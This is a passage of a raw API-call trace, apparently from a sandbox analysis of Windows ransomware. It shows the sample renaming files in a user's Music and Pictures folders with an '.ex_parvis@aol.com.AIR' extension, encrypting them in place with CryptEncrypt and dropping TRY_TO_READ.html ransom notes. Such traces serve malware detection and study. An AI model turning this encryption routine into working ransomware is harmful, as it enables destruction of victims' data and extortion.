pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.117] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.117] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav", dwFileAttributes=0x80) returned 1 [0161.117] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav") returned 57 [0161.117] GetProcessHeap () returned 0x2e0000 [0161.117] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.117] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav" [0161.117] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0161.117] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wu _xooavyqxqclq.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wu _xooavyqxqclq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.119] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wu _xooavyqXqclq.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wu _xooavyqxqclq.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0 [0161.119] GetProcessHeap () returned 0x2e0000 [0161.119] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.119] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=95712) returned 1 [0161.119] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x175e0 [0161.120] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.120] GetProcessHeap () returned 0x2e0000 [0161.120] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.120] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.120] WriteFile (in: hFile=0x4c0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.120] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.121] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.121] ReadFile (in: hFile=0x4c0, lpBuffer=0x3af410, nNumberOfBytesToRead=0x175e0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x175e0, lpOverlapped=0x0) returned 1 [0161.124] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-95712, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.124] WriteFile (in: hFile=0x4c0, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x175e0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x175e0, lpOverlapped=0x0) returned 1 [0161.124] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.124] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.124] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.124] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 48 [0161.124] GetProcessHeap () returned 0x2e0000 [0161.125] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc6) returned 0x319d30 [0161.125] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" [0161.125] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.125] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.127] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0 [0161.127] GetProcessHeap () returned 0x2e0000 [0161.127] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.127] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=504) returned 1 [0161.127] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1f8 [0161.127] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.127] GetProcessHeap () returned 0x2e0000 [0161.127] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.127] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.128] WriteFile (in: hFile=0x4c0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.128] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.128] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.128] ReadFile (in: hFile=0x4c0, lpBuffer=0x32f868, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesRead=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.129] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.129] WriteFile (in: hFile=0x4c0, lpBuffer=0x31d01e0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.129] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.129] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.129] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a", dwFileAttributes=0x80) returned 1 [0161.129] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a") returned 50 [0161.129] GetProcessHeap () returned 0x2e0000 [0161.129] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0161.129] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a" [0161.129] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0161.129] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5pxfnvjli.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5pxfnvjli.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.133] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5pxFnVjLi.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5pxfnvjli.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0 [0161.133] GetProcessHeap () returned 0x2e0000 [0161.133] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.133] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=54574) returned 1 [0161.133] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd52e [0161.133] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.133] GetProcessHeap () returned 0x2e0000 [0161.133] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.133] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.133] WriteFile (in: hFile=0x4c0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.134] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.134] WriteFile (in: hFile=0x4c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.134] ReadFile (in: hFile=0x4c0, lpBuffer=0x3af410, nNumberOfBytesToRead=0xd52e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0xd52e, lpOverlapped=0x0) returned 1 [0161.135] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-54574, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.135] WriteFile (in: hFile=0x4c0, lpBuffer=0x3bc948*, nNumberOfBytesToWrite=0xd52e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bc948*, lpNumberOfBytesWritten=0x2acf9c8*=0xd52e, lpOverlapped=0x0) returned 1 [0161.136] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6a3320, ftCreationTime.dwHighDateTime=0x1d4d41c, ftLastAccessTime.dwLowDateTime=0xbcd8c690, ftLastAccessTime.dwHighDateTime=0x1d4c9af, ftLastWriteTime.dwLowDateTime=0xbcd8c690, ftLastWriteTime.dwHighDateTime=0x1d4c9af, nFileSizeHigh=0x0, nFileSizeLow=0x175e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wu _xooavyqXqclq.wav", cAlternateFileName="WU_XOO~1.WAV")) returned 0xffffffff [0161.136] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6a3320, ftCreationTime.dwHighDateTime=0x1d4d41c, ftLastAccessTime.dwLowDateTime=0xbcd8c690, ftLastAccessTime.dwHighDateTime=0x1d4c9af, ftLastWriteTime.dwLowDateTime=0xbcd8c690, ftLastWriteTime.dwHighDateTime=0x1d4c9af, nFileSizeHigh=0x0, nFileSizeLow=0x175e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wu _xooavyqXqclq.wav", cAlternateFileName="WU_XOO~1.WAV")) returned 0xffffffff [0161.137] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e458 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88da890, ftCreationTime.dwHighDateTime=0x1d4c7fe, ftLastAccessTime.dwLowDateTime=0xb7f61de0, ftLastAccessTime.dwHighDateTime=0x1d4c5cb, ftLastWriteTime.dwLowDateTime=0xb7f61de0, ftLastWriteTime.dwHighDateTime=0x1d4c5cb, nFileSizeHigh=0x0, nFileSizeLow=0x11b3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3WbiuLININsNF2g1Ah2M.jpg", cAlternateFileName="3WBIUL~1.JPG")) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x298a6730, ftCreationTime.dwHighDateTime=0x1d4d2ca, ftLastAccessTime.dwLowDateTime=0x645f9bf0, ftLastAccessTime.dwHighDateTime=0x1d4c550, ftLastWriteTime.dwLowDateTime=0x645f9bf0, ftLastWriteTime.dwHighDateTime=0x1d4c550, nFileSizeHigh=0x0, nFileSizeLow=0x16d17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EV6jESnvs0k.jpg", cAlternateFileName="EV6JES~1.JPG")) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f9f2120, ftCreationTime.dwHighDateTime=0x1d4c788, ftLastAccessTime.dwLowDateTime=0xd7b9d760, ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0xd7b9d760, ftLastWriteTime.dwHighDateTime=0x1d4cb2b, nFileSizeHigh=0x0, nFileSizeLow=0xe973, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fgWz5.bmp", cAlternateFileName="")) returned 1 [0161.137] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7990fa40, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xea282eb0, ftLastAccessTime.dwHighDateTime=0x1d4cec8, ftLastWriteTime.dwLowDateTime=0xea282eb0, ftLastWriteTime.dwHighDateTime=0x1d4cec8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kCH59RWaoO", cAlternateFileName="KCH59R~1")) returned 1 [0161.137] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.142] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe205650, ftCreationTime.dwHighDateTime=0x1d4d2b9, ftLastAccessTime.dwLowDateTime=0x1343d000, ftLastAccessTime.dwHighDateTime=0x1d4c7e0, ftLastWriteTime.dwLowDateTime=0x1343d000, ftLastWriteTime.dwHighDateTime=0x1d4c7e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T8HaqB", cAlternateFileName="")) returned 1 [0161.142] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.145] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9785c830, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.145] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109a3a90, ftCreationTime.dwHighDateTime=0x1d4c5c1, ftLastAccessTime.dwLowDateTime=0x95bd9560, ftLastAccessTime.dwHighDateTime=0x1d4d457, ftLastWriteTime.dwLowDateTime=0x95bd9560, ftLastWriteTime.dwHighDateTime=0x1d4d457, nFileSizeHigh=0x0, nFileSizeLow=0x1441a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XceHf M6rpZrREqSKm.bmp", cAlternateFileName="XCEHFM~1.BMP")) returned 1 [0161.145] FindNextFileW (in: hFindFile=0x35e458, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109a3a90, ftCreationTime.dwHighDateTime=0x1d4c5c1, ftLastAccessTime.dwLowDateTime=0x95bd9560, ftLastAccessTime.dwHighDateTime=0x1d4d457, ftLastWriteTime.dwLowDateTime=0x95bd9560, ftLastWriteTime.dwHighDateTime=0x1d4d457, nFileSizeHigh=0x0, nFileSizeLow=0x1441a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XceHf M6rpZrREqSKm.bmp", cAlternateFileName="XCEHFM~1.BMP")) returned 0 [0161.145] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.145] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.145] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp", dwFileAttributes=0x80) returned 1 [0161.146] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp") returned 62 [0161.146] GetProcessHeap () returned 0x2e0000 [0161.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3a7428 [0161.146] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp" [0161.146] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0161.146] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xcehf m6rpzrreqskm.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xcehf m6rpzrreqskm.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.148] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XceHf M6rpZrREqSKm.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xcehf m6rpzrreqskm.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.148] GetProcessHeap () returned 0x2e0000 [0161.148] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.148] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=82970) returned 1 [0161.148] SetFilePointer (in: 